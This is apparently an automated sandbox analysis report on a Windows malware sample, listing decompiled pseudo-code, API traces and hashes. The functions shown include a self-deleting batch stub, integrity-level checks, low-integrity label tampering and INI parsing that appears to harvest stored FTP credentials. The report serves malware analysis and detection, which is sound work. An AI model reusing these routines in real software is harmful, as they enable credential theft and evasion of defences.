      • Part of subcall function 00416EB9: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,004170F8,004137D8,00000000,00000000,004137D8,?), ref: 00416EF6
      • Part of subcall function 00416EB9: CloseHandle.KERNEL32(00000000,?,004170F8,004137D8,00000000,00000000,004137D8,?), ref: 00416F03
      • Part of subcall function 00411CFE: HeapFree.KERNEL32(00000000,00000000,004134F5,00000000,?,?,?,0041C342,00000000,0041C81E), ref: 00411D11
    • GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 00413872
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: File$CharCloseCreateEnvironmentFreeHandleHeapPathTempVariableWrite
    • String ID: /c "%s"$@echo off%sdel /F "%s"$ComSpec$bat
    • API String ID: 1639923935-3344086482
    • Opcode ID: 2f46809105057d9d7aa24de2a05bb9e8288c2e6d7ee7e40330a7564b77fd6199
    • Instruction ID: 61675fb32138fc359f941b8614dea5df19367ddca67ff258e20a536de7fc0523
    • Opcode Fuzzy Hash: 2f46809105057d9d7aa24de2a05bb9e8288c2e6d7ee7e40330a7564b77fd6199
    • Instruction Fuzzy Hash: 032182B1901208BADF10EFA4CC46FEE77BCEB04745F204167B508E2191D678DBCA8B68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E00413452(void* __ecx) {
    				long _v8;
    				void* _v12;
    				char* _t21;
    				signed char _t22;
    				DWORD* _t25;
    				void* _t32;
    
    				_t28 = 0;
    				if(OpenProcessToken(0xffffffff, 8,  &_v12) == 0) {
    					L14:
    					return _t28;
    				}
    				if(GetTokenInformation(_v12, 0x19, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
    					L13:
    					CloseHandle(_v12);
    					goto L14;
    				} else {
    					_t32 = E00411CCE(_v8);
    					if(_t32 == 0) {
    						L12:
    						goto L13;
    					}
    					if(GetTokenInformation(_v12, 0x19, _t32, _v8,  &_v8) != 0) {
    						_t21 = GetSidSubAuthorityCount( *_t32);
    						if(_t21 != 0) {
    							_t22 =  *_t21;
    							if(_t22 > 0) {
    								_t25 = GetSidSubAuthority( *_t32, (_t22 & 0x000000ff) - 1);
    								if(_t25 != 0) {
    									if( *_t25 >= 0x2000) {
    										asm("sbb bl, bl");
    										_t28 = 3;
    									} else {
    										_t28 = 1;
    									}
    								}
    							}
    						}
    					}
    					E00411CFE(_t32);
    					goto L12;
    				}
    			}










    APIs
    • OpenProcessToken.ADVAPI32(000000FF,00000008,00000001,?,?,?,?,0041C342,00000000,0041C81E), ref: 00413462
    • GetTokenInformation.ADVAPI32(00000001,00000019(TokenIntegrityLevel),00000000,00000000,00000000,0001FD30,?,?,?,0041C342,00000000,0041C81E), ref: 00413482
    • GetLastError.KERNEL32(?,?,?,0041C342,00000000,0041C81E), ref: 00413488
    • GetTokenInformation.ADVAPI32(00000001,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?,?,?,0041C342,00000000,0041C81E), ref: 004134AF
    • GetSidSubAuthorityCount.ADVAPI32(00000000,?,?,?,0041C342,00000000,0041C81E), ref: 004134B7
    • GetSidSubAuthority.ADVAPI32(00000000,?,?,?,?,0041C342,00000000,0041C81E), ref: 004134CE
    • CloseHandle.KERNEL32(00000001,?,?,?,0041C342,00000000,0041C81E), ref: 004134F9
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: Token$AuthorityInformation$CloseCountErrorHandleLastOpenProcess
    • String ID:
    • API String ID: 3714493844-0
    • Opcode ID: d1f6af7294fe1bd2fe65cc0d84c897fa65fe5f1f744b42b28f41edb6cb7ea468
    • Instruction ID: d6dddfac724eface2866c46114b127398c99e13dd0d915702383984522cc1647
    • Opcode Fuzzy Hash: d1f6af7294fe1bd2fe65cc0d84c897fa65fe5f1f744b42b28f41edb6cb7ea468
    • Instruction Fuzzy Hash: E4117F35640059BFEB225FA4CE85EEF3B6EDB05311B140076F500E6160E73A9FC5AA68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041621C(short* _a4) {
    				char _v5;
    				int _v12;
    				void* _v16;
    				void* _v20;
    				int _v24;
    				long _t18;
    
    				_v5 = 0;
    				_t18 = RegCreateKeyExW(0x80000001, L"SOFTWARE\\Microsoft", 0, 0, 0, 4, 0,  &_v16, 0);
    				_t33 = _t18;
    				if(_t18 == 0) {
    					_v12 = 0;
    					do {
    						E00416081(6, 4, _t33, 2, _a4);
    						if(RegCreateKeyExW(_v16, _a4, 0, 0, 0, 3, 0,  &_v20,  &_v24) != 0) {
    							goto L4;
    						} else {
    							RegCloseKey(_v20);
    							if(_v24 == 1) {
    								_v5 = 1;
    							} else {
    								goto L4;
    							}
    						}
    						L7:
    						RegCloseKey(_v16);
    						goto L8;
    						L4:
    						_v12 = _v12 + 1;
    					} while (_v12 < 0x64);
    					goto L7;
    				}
    				L8:
    				return _v5;
    			}










    APIs
    • RegCreateKeyExW.ADVAPI32(?,SOFTWARE\Microsoft,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00416244
      • Part of subcall function 00416081: CharUpperW.USER32(00000000,?,.exe,00000000,00000000), ref: 004161A2
    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00000003,00000000,?,?,00000002,?), ref: 00416276
    • RegCloseKey.ADVAPI32(?), ref: 0041627F
    • RegCloseKey.ADVAPI32(?), ref: 00416299
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: CloseCreate$CharUpper
    • String ID: SOFTWARE\Microsoft$d
    • API String ID: 1794619670-1227932965
    • Opcode ID: 55081c08acd64ccc6dcdc45808d9b5464c1005b437db149cec4334e68073675d
    • Instruction ID: 895308cca878c713374f7ba7b9ef5a6d5b18f33b17e38b670b76746438a6646f
    • Opcode Fuzzy Hash: 55081c08acd64ccc6dcdc45808d9b5464c1005b437db149cec4334e68073675d
    • Instruction Fuzzy Hash: 4F1161B190021CBEEB01AB949D80EFFBBBCEF44388F1140A6F90072151D2759E858B75
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 50%
    			E0041537F(intOrPtr _a4) {
    				struct _ACL* _v8;
    				struct _SECURITY_DESCRIPTOR* _v12;
    				int _v16;
    				int _v20;
    				void** _t11;
    				int _t16;
    				struct _ACL* _t18;
    
    				_t18 = 0;
    				E004133CA(L"SeSecurityPrivilege");
    				_t11 =  &_v12;
    				__imp__ConvertStringSecurityDescriptorToSecurityDescriptorW(L"S:(ML;CIOI;NRNWNX;;;LW)", 1, _t11, 0);
    				if(_t11 != 0) {
    					_v8 = 0;
    					_t16 = GetSecurityDescriptorSacl(_v12,  &_v20,  &_v8,  &_v16);
    					if(_t16 != 0) {
    						__imp__SetNamedSecurityInfoW(_a4, 1, 0x10, 0, 0, 0, _v8);
    						if(_t16 == 0) {
    							_t18 = 1;
    						}
    					}
    					LocalFree(_v12);
    				}
    				return _t18;
    			}











    APIs
      • Part of subcall function 004133CA: GetCurrentThread.KERNEL32 ref: 004133DA
      • Part of subcall function 004133CA: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,00410CA8,SeTcbPrivilege), ref: 004133E1
      • Part of subcall function 004133CA: OpenProcessToken.ADVAPI32(000000FF,00000020,00410CA8,?,?,?,?,00410CA8,SeTcbPrivilege), ref: 004133F3
    • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,00000000,00000000), ref: 0041539E
    • GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,00000000), ref: 004153BA
    • SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,?), ref: 004153D1
    • LocalFree.KERNEL32(00000000), ref: 004153E0
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: Security$Descriptor$OpenThreadToken$ConvertCurrentFreeInfoLocalNamedProcessSaclString
    • String ID: S:(ML;CIOI;NRNWNX;;;LW)$SeSecurityPrivilege
    • API String ID: 3555451682-1937014404
    • Opcode ID: dd688c7bc4915bad12d6e442eb5b119a99f11f08a86f49f606785e3db28840af
    • Instruction ID: d23ebe32668396ebe864892e1e21dbb5c896f3ca7697efe037d0f001a1789905
    • Opcode Fuzzy Hash: dd688c7bc4915bad12d6e442eb5b119a99f11f08a86f49f606785e3db28840af
    • Instruction Fuzzy Hash: F901817164020CBFEB109F908D85EEF7B7CEB04740F100422FA12F21A0E6B58A949B28
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E00419E89(void* __eax, signed int __ecx, struct HWND__* _a4, signed int _a8, signed int _a12, signed short _a16, signed int _a20, intOrPtr _a24, intOrPtr _a28) {
    				long _v8;
    				void* __ebx;
    				void* __esi;
    				signed int _t47;
    				signed short _t58;
    				int _t65;
    				signed int _t66;
    				signed short _t75;
    				void* _t79;
    
    				_t70 = __ecx;
    				_push(__ecx);
    				_t75 = _a16;
    				_t79 = __eax;
    				if(_t75 == 0x201 || _t75 == 0x207 || _t75 == 0x204) {
    					_t65 = GetAncestor(_a4, 2);
    					if(_t65 ==  *(_t79 + 0x170)) {
    						goto L8;
    					}
    					_t70 = _a12 & 0x0000ffff;
    					_t47 = SendMessageTimeoutW(_a4, 0x21, _t65, (_t75 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff, 2, 0x64,  &_v8);
    					if(_t47 == 0 || _v8 != 2 && _v8 != 4) {
    						 *(_t79 + 0x170) = _t65;
    						goto L8;
    					} else {
    						goto L35;
    					}
    				} else {
    					L8:
    					_t66 = _a12 & 0x0000ffff;
    					_v8 = _t66;
    					PostMessageW(_a4, 0x20, _a4, (_t75 & 0x0000ffff) << 0x00000010 | _t66);
    					if(_a12 != 1) {
    						_t47 = E00419DAA(_t70, _t79, _a4, _a20);
    						_a20 = _t47;
    						__eflags = _t66 - 8;
    						if(__eflags > 0) {
    							__eflags = _t66 - 9;
    							if(__eflags == 0) {
    								__eflags = _t47 - 0xa2;
    								if(_t47 != 0xa2) {
    									__eflags = _t47 - 0xa5;
    									if(_t47 != 0xa5) {
    										L35:
    										return _t47;
    									}
    									_t47 = 0xffff;
    									L59:
    									__eflags = _t47;
    									if(_t47 == 0) {
    										goto L35;
    									}
    									__eflags = _t47 - 0xffff;
    									if(_t47 != 0xffff) {
    										L33:
    										_push(_a28);
    										_push(_t47 & 0x0000ffff);
    										_push(0x112);
    										L34:
    										_t47 = PostMessageW(_a4, ??, ??, ??);
    										goto L35;
    									}
    									L61:
    									_push(_a28);
    									_push(_a4);
    									_push(0x7b);
    									goto L34;
    								}
    								_t47 =  *(_a8 + 0x24);
    								__eflags = _t47 & 0x00010000;
    								if((_t47 & 0x00010000) == 0) {
    									goto L35;
    								}
    								asm("sbb eax, eax");
    								_t47 = ( ~(_t47 & 0x01000000) & 0x000000f0) + 0x0000f030 & 0x0000ffff;
    								goto L59;
    							}
    							if(__eflags <= 0) {
    								L25:
    								_push(_a28);
    								_push(_t66);
    								L10:
    								_push(_t47);
    								goto L34;
    							}
    							__eflags = _t66 - 0x11;
    							if(_t66 <= 0x11) {
    								L40:
    								__eflags = _t47 - 0xa1;
    								if(_t47 == 0xa1) {
    									_t47 = E00419C1A(_a4, _t79, GetWindowThreadProcessId(_a4, 0), _a12, 1);
    								}
    								goto L35;
    							}
    							__eflags = _t66 - 0x14;
    							if(_t66 == 0x14) {
    								__eflags = _t47 - 0xa2;
    								if(_t47 != 0xa2) {
    									L21:
    									__eflags = _t47 - 0xa5;
    									L22:
    									if(__eflags != 0) {
    										goto L35;
    									}
    									goto L61;
    								}
    								L32:
    								_t47 = 0xf060;
    								goto L33;
    							}
    							__eflags = _t66 - 0x15;
    							if(_t66 != 0x15) {
    								goto L25;
    							}
    							__eflags = _t47 - 0xa2;
    							if(_t47 != 0xa2) {
    								goto L21;
    							}
    							_t47 = 0xf180;
    							goto L33;
    						}
    						if(__eflags == 0) {
    							__eflags = _t47 - 0xa2;
    							if(_t47 != 0xa2) {
    								goto L21;
    							}
    							_t47 = _a8;
    							__eflags =  *(_t47 + 0x24) & 0x00020000;
    							if(( *(_t47 + 0x24) & 0x00020000) == 0) {
    								goto L35;
    							}
    							_t47 = 0xf020;
    							goto L33;
    						}
    						__eflags = _t66 - 2;
    						if(_t66 == 2) {
    							__eflags = _t47 - 0xa3;
    							if(_t47 == 0xa3) {
    								goto L25;
    							}
    							__eflags = _t47 - 0xa5;
    							if(_t47 == 0xa5) {
    								goto L61;
    							}
    							goto L40;
    						}
    						__eflags = _t66 - 3;
    						if(_t66 == 3) {
    							__eflags = _t47 - 0xa3;
    							if(_t47 != 0xa3) {
    								__eflags = _t47 - 0xa5;
    								if(_t47 == 0xa5) {
    									goto L61;
    								}
    								__eflags = _t47 - 0xa1;
    								goto L22;
    							}
    							goto L32;
    						}
    						__eflags = _t66 - 5;
    						if(_t66 == 5) {
    							__eflags = _t47 - 0xa1;
    							if(_t47 != 0xa1) {
    								__eflags = _t47 - 0xa0;
    								if(_t47 != 0xa0) {
    									goto L35;
    								}
    								_push(0);
    								_push(0xfffffffe);
    								L28:
    								_push( *((intOrPtr*)(_t79 + 8)));
    								goto L34;
    							}
    							_push(0);
    							_push(0xffffffff);
    							goto L28;
    						}
    						__eflags = _t66 - 6 - 1;
    						if(_t66 - 6 > 1) {
    							goto L25;
    						}
    						__eflags = _t47 - 0xa1;
    						if(_t47 == 0xa1) {
    							E00419C1A(_a4, _t79, GetWindowThreadProcessId(_a4, 0), 0, 1);
    							_t47 = _a20;
    							_t66 = _v8;
    							goto L25;
    						}
    						__eflags = _t47 - 0xa2;
    						if(_t47 == 0xa2) {
    							goto L25;
    						}
    						__eflags = _t47 - 0xa3;
    						if(_t47 == 0xa3) {
    							goto L25;
    						}
    						__eflags = _t47 - 0xa0;
    						if(_t47 == 0xa0) {
    							goto L25;
    						}
    						goto L21;
    					}
    					_t58 = E0040BB61(0, _t79, 0);
    					_push(_a24);
    					_push(_t58 & 0x0000ffff);
    					_t47 = E00419DAA(_t79, _t79, _a4, _a16);
    					goto L10;
    				}
    			}













    APIs
    • GetAncestor.USER32(?,00000002), ref: 00419EB2
    • SendMessageTimeoutW.USER32 ref: 00419EDD
    • PostMessageW.USER32(?,00000020,?,00000000), ref: 00419F1F
    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00419FB5
    • PostMessageW.USER32(?,00000112,?,?), ref: 0041A008
    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0041A047
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: Message$PostProcessThreadWindow$AncestorSendTimeout
    • String ID:
    • API String ID: 1223205383-0
    • Opcode ID: 97cdfd520a455733afc587644e0d2fa9c6f90aa6e1801447c7e3d09afd58463d
    • Instruction ID: dfeb2fe246d3d7e526f7f6e31d07448cf0de1564f34f95a55f0b2426e05824b5
    • Opcode Fuzzy Hash: 97cdfd520a455733afc587644e0d2fa9c6f90aa6e1801447c7e3d09afd58463d
    • Instruction Fuzzy Hash: C5518D31600309BAEF304E18CD99BFE3A65EB09344F244527F945D62E1C27EDDE2A65B
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E00419E89(void* __eax, signed int __ecx, struct HWND__* _a4, signed int _a8, signed int _a12, signed short _a16, signed int _a20, intOrPtr _a24, intOrPtr _a28) {
    				long _v8;
    				void* __ebx;
    				void* __esi;
    				signed int _t47;
    				signed short _t58;
    				int _t65;
    				signed int _t66;
    				signed short _t75;
    				void* _t79;
    
    				_t70 = __ecx;
    				_push(__ecx);
    				_t75 = _a16;
    				_t79 = __eax;
    				if(_t75 == 0x201 || _t75 == 0x207 || _t75 == 0x204) {
    					_t65 = GetAncestor(_a4, 2);
    					if(_t65 ==  *(_t79 + 0x170)) {
    						goto L8;
    					}
    					_t70 = _a12 & 0x0000ffff;
    					_t47 = SendMessageTimeoutW(_a4, 0x21, _t65, (_t75 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff, 2, 0x64,  &_v8);
    					if(_t47 == 0 || _v8 != 2 && _v8 != 4) {
    						 *(_t79 + 0x170) = _t65;
    						goto L8;
    					} else {
    						goto L35;
    					}
    				} else {
    					L8:
    					_t66 = _a12 & 0x0000ffff;
    					_v8 = _t66;
    					PostMessageW(_a4, 0x20, _a4, (_t75 & 0x0000ffff) << 0x00000010 | _t66);
    					if(_a12 != 1) {
    						_t47 = E00419DAA(_t70, _t79, _a4, _a20);
    						_a20 = _t47;
    						__eflags = _t66 - 8;
    						if(__eflags > 0) {
    							__eflags = _t66 - 9;
    							if(__eflags == 0) {
    								__eflags = _t47 - 0xa2;
    								if(_t47 != 0xa2) {
    									__eflags = _t47 - 0xa5;
    									if(_t47 != 0xa5) {
    										L35:
    										return _t47;
    									}
    									_t47 = 0xffff;
    									L59:
    									__eflags = _t47;
    									if(_t47 == 0) {
    										goto L35;
    									}
    									__eflags = _t47 - 0xffff;
    									if(_t47 != 0xffff) {
    										L33:
    										_push(_a28);
    										_push(_t47 & 0x0000ffff);
    										_push(0x112);
    										L34:
    										_t47 = PostMessageW(_a4, ??, ??, ??);
    										goto L35;
    									}
    									L61:
    									_push(_a28);
    									_push(_a4);
    									_push(0x7b);
    									goto L34;
    								}
    								_t47 =  *(_a8 + 0x24);
    								__eflags = _t47 & 0x00010000;
    								if((_t47 & 0x00010000) == 0) {
    									goto L35;
    								}
    								asm("sbb eax, eax");
    								_t47 = ( ~(_t47 & 0x01000000) & 0x000000f0) + 0x0000f030 & 0x0000ffff;
    								goto L59;
    							}
    							if(__eflags <= 0) {
    								L25:
    								_push(_a28);
    								_push(_t66);
    								L10:
    								_push(_t47);
    								goto L34;
    							}
    							__eflags = _t66 - 0x11;
    							if(_t66 <= 0x11) {
    								L40:
    								__eflags = _t47 - 0xa1;
    								if(_t47 == 0xa1) {
    									_t47 = E00419C1A(_a4, _t79, GetWindowThreadProcessId(_a4, 0), _a12, 1);
    								}
    								goto L35;
    							}
    							__eflags = _t66 - 0x14;
    							if(_t66 == 0x14) {
    								__eflags = _t47 - 0xa2;
    								if(_t47 != 0xa2) {
    									L21:
    									__eflags = _t47 - 0xa5;
    									L22:
    									if(__eflags != 0) {
    										goto L35;
    									}
    									goto L61;
    								}
    								L32:
    								_t47 = 0xf060;
    								goto L33;
    							}
    							__eflags = _t66 - 0x15;
    							if(_t66 != 0x15) {
    								goto L25;
    							}
    							__eflags = _t47 - 0xa2;
    							if(_t47 != 0xa2) {
    								goto L21;
    							}
    							_t47 = 0xf180;
    							goto L33;
    						}
    						if(__eflags == 0) {
    							__eflags = _t47 - 0xa2;
    							if(_t47 != 0xa2) {
    								goto L21;
    							}
    							_t47 = _a8;
    							__eflags =  *(_t47 + 0x24) & 0x00020000;
    							if(( *(_t47 + 0x24) & 0x00020000) == 0) {
    								goto L35;
    							}
    							_t47 = 0xf020;
    							goto L33;
    						}
    						__eflags = _t66 - 2;
    						if(_t66 == 2) {
    							__eflags = _t47 - 0xa3;
    							if(_t47 == 0xa3) {
    								goto L25;
    							}
    							__eflags = _t47 - 0xa5;
    							if(_t47 == 0xa5) {
    								goto L61;
    							}
    							goto L40;
    						}
    						__eflags = _t66 - 3;
    						if(_t66 == 3) {
    							__eflags = _t47 - 0xa3;
    							if(_t47 != 0xa3) {
    								__eflags = _t47 - 0xa5;
    								if(_t47 == 0xa5) {
    									goto L61;
    								}
    								__eflags = _t47 - 0xa1;
    								goto L22;
    							}
    							goto L32;
    						}
    						__eflags = _t66 - 5;
    						if(_t66 == 5) {
    							__eflags = _t47 - 0xa1;
    							if(_t47 != 0xa1) {
    								__eflags = _t47 - 0xa0;
    								if(_t47 != 0xa0) {
    									goto L35;
    								}
    								_push(0);
    								_push(0xfffffffe);
    								L28:
    								_push( *((intOrPtr*)(_t79 + 8)));
    								goto L34;
    							}
    							_push(0);
    							_push(0xffffffff);
    							goto L28;
    						}
    						__eflags = _t66 - 6 - 1;
    						if(_t66 - 6 > 1) {
    							goto L25;
    						}
    						__eflags = _t47 - 0xa1;
    						if(_t47 == 0xa1) {
    							E00419C1A(_a4, _t79, GetWindowThreadProcessId(_a4, 0), 0, 1);
    							_t47 = _a20;
    							_t66 = _v8;
    							goto L25;
    						}
    						__eflags = _t47 - 0xa2;
    						if(_t47 == 0xa2) {
    							goto L25;
    						}
    						__eflags = _t47 - 0xa3;
    						if(_t47 == 0xa3) {
    							goto L25;
    						}
    						__eflags = _t47 - 0xa0;
    						if(_t47 == 0xa0) {
    							goto L25;
    						}
    						goto L21;
    					}
    					_t58 = E0040BB61(0, _t79, 0);
    					_push(_a24);
    					_push(_t58 & 0x0000ffff);
    					_t47 = E00419DAA(_t79, _t79, _a4, _a16);
    					goto L10;
    				}
    			}

    APIs
    • GetAncestor.USER32(?,00000002), ref: 00419EB2
    • SendMessageTimeoutW.USER32 ref: 00419EDD
    • PostMessageW.USER32(?,00000020,?,00000000), ref: 00419F1F
    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00419FB5
    • PostMessageW.USER32(?,00000112,?,?), ref: 0041A008
    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0041A047
    Memory Dump Source
    • Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp
    Similarity
    • API ID: Message$PostProcessThreadWindow$AncestorSendTimeout
    • String ID:
    • API String ID: 1223205383-0
    • Opcode ID: 97cdfd520a455733afc587644e0d2fa9c6f90aa6e1801447c7e3d09afd58463d
    • Instruction ID: dfeb2fe246d3d7e526f7f6e31d07448cf0de1564f34f95a55f0b2426e05824b5
    • Opcode Fuzzy Hash: 97cdfd520a455733afc587644e0d2fa9c6f90aa6e1801447c7e3d09afd58463d
    • Instruction Fuzzy Hash: C5518D31600309BAEF304E18CD99BFE3A65EB09344F244527F945D62E1C27EDDE2A65B
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E00409813(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
    				short _v524;
    				short _v528;
    				char _v568;
    				short _v584;
    				char _v596;
    				short _v600;
    				char _v608;
    				short _v612;
    				char _v616;
    				short _v620;
    				char _v624;
    				short _v628;
    				short* _v632;
    				WCHAR* _v636;
    				WCHAR* _v640;
    				WCHAR* _v644;
    				WCHAR* _v648;
    				WCHAR* _v652;
    				void* __edi;
    				void* __esi;
    				WCHAR* _t54;
    				WCHAR* _t57;
    				void* _t61;
    				void* _t63;
    				void* _t65;
    				void* _t67;
    				void* _t69;
    				WCHAR* _t72;
    				WCHAR* _t74;
    				long _t78;
    				int _t81;
    				long _t85;
    				long _t88;
    				WCHAR* _t89;
    				void* _t90;
    				WCHAR* _t94;
    				WCHAR* _t95;
    				WCHAR* _t111;
    				WCHAR* _t112;
    				WCHAR* _t117;
    				intOrPtr _t126;
    				signed int _t127;
    				void* _t129;
    
    				_t129 = (_t127 & 0xfffffff8) - 0x284;
    				if(E00417593( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
    					L21:
    					return 1;
    				}
    				_t132 =  *__edx & 0x00000010;
    				if(( *__edx & 0x00000010) == 0) {
    					_t117 = E00411CCE(0x1fffe);
    					_v628 = _t117;
    					__eflags = _t117;
    					if(_t117 == 0) {
    						goto L21;
    					}
    					_t54 = GetPrivateProfileStringW(0, 0, 0, _t117, 0xffff,  &_v524);
    					__eflags = _t54;
    					if(_t54 <= 0) {
    						L20:
    						E00411CFE(_t117);
    						goto L21;
    					}
    					_t9 =  &(_t54[0]); // 0x1
    					_t57 = E00412BAE(_t117, _t9);
    					__eflags = _t57;
    					if(_t57 == 0) {
    						goto L20;
    					}
    					_t111 = E00411CCE(0xc1c);
    					_v640 = _t111;
    					__eflags = _t111;
    					if(_t111 != 0) {
    						_t11 =  &(_t111[0x2fd]); // 0x5fa
    						_v632 = _t11;
    						_v644 = _t117;
    						_t61 = 0x72;
    						E00419897(_t61,  &_v584);
    						_t63 = 0x73;
    						E00419897(_t63,  &_v596);
    						_t65 = 0x74;
    						E00419897(_t65,  &_v608);
    						_t67 = 0x75;
    						E00419897(_t67,  &_v624);
    						_t69 = 0x76;
    						E00419897(_t69,  &_v616);
    						goto L9;
    						L18:
    						_t74 = E00412BEA(_v648, 1);
    						_v652 = _t74;
    						__eflags = _t74;
    						if(_t74 != 0) {
    							_t111 = _v644;
    							L9:
    							_t72 = StrStrIW(_v644,  &_v584);
    							__eflags = _t72;
    							if(_t72 == 0) {
    								_t78 = GetPrivateProfileStringW(_v648,  &_v600, 0, _t111, 0xff,  &_v528);
    								__eflags = _t78;
    								if(_t78 != 0) {
    									_t81 = GetPrivateProfileIntW(_v648,  &_v612, 0x15,  &_v528);
    									_v640 = _t81;
    									__eflags = _t81 - 1 - 0xfffe;
    									if(_t81 - 1 <= 0xfffe) {
    										_t112 =  &(_t111[0xff]);
    										_t85 = GetPrivateProfileStringW(_v648,  &_v628, 0, _t112, 0xff,  &_v528);
    										__eflags = _t85;
    										if(_t85 != 0) {
    											_t33 =  &(_t112[0xff]); // 0x0
    											_t124 = _t33;
    											_t88 = GetPrivateProfileStringW(_v648,  &_v620, 0, _t33, 0xff,  &_v528);
    											__eflags = _t88;
    											if(_t88 != 0) {
    												_t89 = E0041284D(_t124);
    												__eflags = _t89;
    												if(_t89 > 0) {
    													_t125 =  &_v568;
    													_t90 = 0x55;
    													E00419897(_t90,  &_v568);
    													_push(_v640);
    													_t38 =  &(_t112[0xff]); // 0x0
    													_push(_v644);
    													_push(_t112);
    													_t113 = _v636;
    													_t94 = E004129F1(_t125, 0x311, _v636, _t125);
    													_t129 = _t129 + 0x14;
    													__eflags = _t94;
    													if(_t94 > 0) {
    														_t126 = _a4;
    														_t95 = E004120F2(_t94, _t126, _t113);
    														__eflags = _t95;
    														if(_t95 != 0) {
    															_t42 = _t126 + 4;
    															 *_t42 =  &(( *(_t126 + 4))[0]);
    															__eflags =  *_t42;
    														}
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    							goto L18;
    						}
    						E00411CFE(_v644);
    						_t117 = _v636;
    					}
    					goto L20;
    				} else {
    					E004097DB(_t132,  &_v524, _a4);
    					goto L21;
    				}
    			}

    APIs
      • Part of subcall function 00417593: PathCombineW.SHLWAPI(0041C47F,0041C47F,?,0041C47F,?,?), ref: 004175B2
    • GetPrivateProfileStringW.KERNEL32 ref: 00409888
    • StrStrIW.SHLWAPI(?,?), ref: 00409915
    • GetPrivateProfileStringW.KERNEL32 ref: 0040993D
    • GetPrivateProfileIntW.KERNEL32 ref: 0040995A
    • GetPrivateProfileStringW.KERNEL32 ref: 0040998B
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: PrivateProfile$String$CombinePath
    • String ID:
    • API String ID: 2134968610-0
    • Opcode ID: 697b6d238aea26d2ca22bc44603dbc5fe0e82df11673bc0a19a6bcf8d87854b2
    • Instruction ID: c147e4dfb0c90b59585134127e858cb964f9ea13a8f2a33957826684169cd013
    • Opcode Fuzzy Hash: 697b6d238aea26d2ca22bc44603dbc5fe0e82df11673bc0a19a6bcf8d87854b2
    • Instruction Fuzzy Hash: 3D518572604346AADA10EB55CC01BEBB7E8EFC5704F00093EF998E3192DB78DD458B96
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040E65D(void* __eflags, char* _a4, struct _GOPHER_FIND_DATAA _a8, void _a12, struct _GOPHER_FIND_DATAA _a16) {
    				char _v5;
    				char _v12;
    				signed int _v16;
    				char _v20;
    				char _v24;
    				long _v28;
    				void* __edi;
    				void* __esi;
    				signed int _t55;
    				void* _t58;
    				struct _GOPHER_FIND_DATAA _t59;
    				intOrPtr _t60;
    				struct _GOPHER_FIND_DATAA _t61;
    				struct _GOPHER_FIND_DATAA _t62;
    				signed int _t71;
    				struct _GOPHER_FIND_DATAA _t79;
    				struct _GOPHER_FIND_DATAA _t84;
    				int _t89;
    				struct _GOPHER_FIND_DATAA _t91;
    				void* _t96;
    				intOrPtr* _t99;
    				struct _GOPHER_FIND_DATAA _t103;
    				struct _GOPHER_FIND_DATAA _t107;
    
    				_v16 = _v16 | 0xffffffff;
    				EnterCriticalSection(0x422aa4);
    				_t99 = _a4;
    				_t55 = E0040DEC2( *_t99);
    				if(_t55 == 0xffffffff) {
    					L33:
    					LeaveCriticalSection(0x422aa4);
    					return _v16;
    				}
    				_t58 = _t55 * 0x24 +  *0x422abc;
    				if( *((intOrPtr*)(_t58 + 0x10)) <= 0) {
    					goto L33;
    				}
    				_t96 = _t58;
    				if( *((intOrPtr*)(_t96 + 0x10)) != 1 || ( *( *(_t96 + 0xc)) & 0x00000003) == 0) {
    					_t59 = _a16;
    					__eflags = _t59;
